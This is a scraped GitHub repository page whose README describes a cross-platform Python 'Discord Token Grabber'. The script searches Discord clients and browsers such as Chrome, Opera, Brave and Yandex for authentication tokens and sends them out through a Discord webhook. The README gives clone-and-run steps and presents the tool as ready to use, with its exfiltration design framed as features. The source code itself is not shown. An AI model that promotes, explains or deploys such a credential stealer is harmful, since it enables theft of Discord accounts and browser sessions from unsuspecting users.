Skip to content

Fastiraz/Discord-Tokens-Grabber

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Discord Token Grabber

Discord Token Grabber is a Python script that helps you find and extract tokens used by various applications on different operating systems. Tokens are commonly used for authentication purposes in applications like Discord, web browsers, and more.


Table of Contents

Features

  • No local caching
  • Transfers via Discord webhook
  • Searches for authorization tokens in multiple directories (Discord, Discord PTB, Discord Canary, Google chrome, Opera, Brave and Yandex)
  • No external Python modules required
  • Cross-platform support

Getting Started

Prerequisites

  • Python 3.x

Installation

  1. Clone the repository:
git clone https://github.com/Fastiraz/Discord-Tokens-Grabber.git
  1. Navigate to the project directory:
cd Discord-Tokens-Grabber

Usage

  1. Open a terminal or command prompt.
  2. Navigate to the project directory where the script is located.
  3. Run the script:

For Windows

py grab.py

For Unix/Linux

python3 grab.py
  1. The script will detect your operating system and attempt to find tokens for supported applications.

  2. Tokens, if found, will be displayed in the terminal.

Supported Operating Systems

  • Linux
  • macOS (Darwin)
  • Windows

Supported Softwares

  • Google Chrome
  • Discord
  • Discord Canary
  • Discord PTB
  • Opera
  • Brave
  • Yandex

Please note that the paths to application data may vary depending on your specific setup, and permissions may be required to access certain directories.

About

A simple cross-platform Discord token grabber.

Resources

Stars

Watchers

Forks